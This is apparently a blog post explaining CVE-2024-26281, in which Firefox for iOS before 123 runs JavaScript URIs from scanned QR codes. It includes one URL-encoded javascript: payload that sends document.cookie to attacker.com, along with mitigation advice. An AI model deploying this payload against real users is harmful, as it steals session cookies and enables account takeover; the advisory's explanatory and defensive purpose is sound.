A severe vulnerability (CVE-2024-26281) has recently been discovered affecting Firefox for iOS versions prior to 123. This vulnerability allows malicious actors to execute unauthorized scripts on the top origin site currently displayed in the address bar when users scan a JavaScript URI using the Firefox QR code scanner. In this post, we will dissect this vulnerability, review the code snippet associated with it, and provide insight on how to protect your devices from exploitation.

Vulnerability Details

This critical vulnerability is present in Firefox for iOS versions prior to 123. Upon scanning a QR code containing a JavaScript URI, the attacker could exploit this vulnerability and execute unauthorized scripts on the current top origin sites in the URL bar. This could lead to various malicious activities, including stealing sensitive data, defacing a website, or enabling further attacks.

Code Snippet

The following code snippet demonstrates how the attacker could exploit this vulnerability by crafting a QR code with a JavaScript URI:

javascript:(function()%7Blet%20xreq%20%3D%20new%20XMLHttpRequest()%3Bxreq.onreadystatechange%20%3D%20function()%20%7Bif%20(xreq.readyState%20%3D%3D%20XMLHttpRequest.DONE)%20%7Balert(xreq.responseText)%3B%7D%7D%3Bxreq.open(%22GET%22%2C%20%22https%3A//attacker.com/steal_data/%3Fcookie%3D%22%20%2B%20document.cookie%2C%20true)%3Bxreq.send()%3B%7D)()

Upon scanning this QR code, the JavaScript code is executed, leading to an unauthorized HTTP GET request to the attacker's website with the victim's cookie information.

Original References

Mozilla Security Advisory addressing this vulnerability: MFSA2024-11
CVE Details: CVE-2024-26281

Exploit Details

For an attacker to exploit this vulnerability, they must generate a malicious QR code containing a JavaScript URI and persuade the victim to scan it using the vulnerable version of Firefox for iOS. Once the victim scans this QR code, the unauthorized script will execute on the top origin site in the URL bar.

Possible consequences of this exploit include

1. Leaking sensitive user information (such as login credentials or personally identifiable information)

Mitigation

To protect against this vulnerability, it is recommended that users urgently update their Firefox for iOS application to version 123 or later. This update contains the necessary security patches to address CVE-2024-26281 and prevent unauthorized script execution upon scanning JavaScript URIs with the QR code scanner.

In addition to updating the Firefox for iOS application, users should exercise caution when scanning unknown QR codes. It's essential to verify the source of QR codes and avoid scanning suspicious or unsolicited codes from untrusted sources.

Conclusion

CVE-2024-26281 is a critical vulnerability affecting Firefox for iOS users, allowing unauthorized script execution upon scanning a JavaScript URI containing QR code. This vulnerability highlights the importance of keeping applications up-to-date and exercising caution when scanning unknown or potentially malicious QR codes. By updating the Firefox for iOS application to version 123 or later, users can safeguard their devices from the exploitation of this dangerous vulnerability.

Timeline

Published on: 02/22/2024 15:15:08 UTC
Last modified on: 02/22/2024 19:07:27 UTC